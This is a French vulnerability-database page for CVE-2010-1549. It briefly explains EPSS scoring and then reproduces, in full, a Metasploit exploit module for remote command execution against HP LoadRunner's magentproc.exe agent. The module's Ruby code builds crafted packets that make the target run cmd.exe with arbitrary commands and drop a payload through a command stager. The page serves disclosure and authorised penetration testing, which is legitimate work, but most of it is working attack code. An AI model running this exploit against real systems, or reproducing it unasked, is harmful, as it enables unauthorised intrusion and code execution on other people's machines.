CVE-2010-1549 : Détail

Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.

Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.

## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::Tcp include Msf::Exploit::CmdStager def initialize(info={}) super(update_info(info, 'Name' => "HP Mercury LoadRunner Agent magentproc.exe Remote Command Execution", 'Description' => %q{ This module exploits a remote command execution vulnerablity in HP LoadRunner before 9.50 and also HP Performance Center before 9.50. HP LoadRunner 12.53 and other versions are also most likely vulneable if the (non-default) SSL option is turned off. By sending a specially crafted packet, an attacker can execute commands remotely. The service is vulnerable provided the Secure Channel feature is disabled (default). }, 'License' => MSF_LICENSE, 'Author' => [ 'Unknown', # Original discovery # From Tenable Network Security 'aushack' # metasploit module ], 'References' => [ ['CVE', '2010-1549'], ['ZDI', '10-080'], ['BID', '39965'], ['URL', 'https://support.hpe.com/hpsc/doc/public/display?docId=c00912968'] ], 'Payload' => { 'BadChars' => "\x0d\x0a\x00" }, 'Platform' => 'win', 'Targets' => [ # Note: software reportedly supports Linux - may also be vulnerable. ['Windows (Dropper)', 'Platform' => 'win', 'Arch' => [ARCH_X86, ARCH_X64] ], ], 'Privileged' => false, 'Stance' => Msf::Exploit::Stance::Aggressive, 'DisclosureDate' => 'May 06 2010', 'DefaultTarget' => 0)) register_options([Opt::RPORT(54345)]) end def autofilter true end def execute_command(cmd, _opts = {}) guid = Rex::Text.encode_base64(Rex::Text.rand_text_alphanumeric(17)) randstr = Rex::Text.rand_text_alpha(16) server_name = Rex::Text.rand_text_alpha(7) server_ip = datastore['LHOST'] server_port = Rex::Text.rand_text_numeric(4) # If linux is one day supported, cmd1 = /bin/sh and cmd2 = -c cmd cmd1 = "C:\\Windows\\system32\\cmd.exe" cmd2 = "/C \"#{cmd}\"" pkt1 = [0x19].pack('N') + guid + '0' pkt2 = [0x6].pack('N') + [0x0].pack('N') + "(-server_type=8)(-server_name=#{server_name})(-server_full_name=#{server_name})" pkt2 << "(-server_ip_name=#{server_ip})(-server_port=#{server_port})(-server_fd_secondary=4)(-guid_identifier=#{guid})\x00\x00" pkt2 << [0x7530].pack('N') pkt3 = [4 + pkt2.length].pack('N') + pkt2 pkt4 = [0x1c].pack('N') + [0x05].pack('N') + [0x01].pack('N') + randstr + pkt3 pkt5 = [pkt4.length].pack('N') + pkt4 pkt6 = [0x437].pack('N') + [0x0].pack('N') + [0x31].pack('N') + [1].pack('N') + [0x31000000].pack('N') pkt6 << [cmd1.length].pack('N') + cmd1 + "\x00" + [cmd2.length].pack('N') + cmd2 + [0x0].pack('N') + [0x0].pack('N') pkt7 = [4 + pkt6.length].pack('N') + pkt6 pkt8 = [0x18].pack('N') + [0x04].pack('N') + randstr + pkt7 pkt9 = [pkt8.length].pack('N') + pkt8 sploit = pkt1 + pkt5 + pkt9 connect sock.put(sploit) disconnect end def exploit print_status('Sending payload...') execute_cmdstager(linemax: 1500) end end